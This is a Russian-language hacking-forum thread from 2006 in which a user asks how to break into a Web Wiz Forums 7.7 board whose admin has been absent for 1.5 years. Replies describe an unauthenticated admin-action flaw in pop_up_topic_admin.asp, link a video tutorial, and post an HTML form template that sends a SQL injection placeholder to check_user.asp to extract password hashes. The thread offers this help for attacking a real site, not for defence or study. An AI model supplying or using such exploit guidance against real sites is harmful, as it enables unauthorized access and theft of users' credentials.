Просмотр полной версии : Есть ли уязвимости в Web Wiz Forums version 7.7
В этой версии форума
Powered by Web Wiz Forums version 7.7
в первый раз сталкиваюсь с данным форумом, может кто подскажет как ломануть, только не XSS админ не появлялся 1.5 года.
Dracula4ever
11.07.2006, 09:14
Да есть!!:-)
В них есть SQL инъекция потому что сценарий pop_up_topic_admin.asp не проверяет разрешения доступа при обновлении параметров темы.
Поэтому удаленный атакующий может неавторизованно выполнять административные операции над темой форума.
Да есть!!:-)
удаленный атакующий может неавторизованно выполнять административные операции над темой форума.
И все, а как на счет веб шелла, через скуль инекцию никак?
Dracula4ever
11.07.2006, 10:01
Бляяяя....
Вот тебе линк на видео урок.
http://video.antichat.org/file134.html
Бляяяя....
Вот тебе линк на видео урок.
http://video.antichat.org/file134.html
а толку то, ведь админы уже больше года не появляются.
j0nathan
14.07.2006, 19:05
не хочешь иксСС на скуль
<html>
< form method="POST" action="http://target/[product]/check_user.asp">
< input type="hidden" name="txtUserName" value="[SQL INJECTION]">
< input type="hidden" name="txtUserPass" value="1">
< input type="submit" value="Submit" name="submit">
< /form></html>
Сиди вытигивай хэш из БД !! Удачи ;)
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot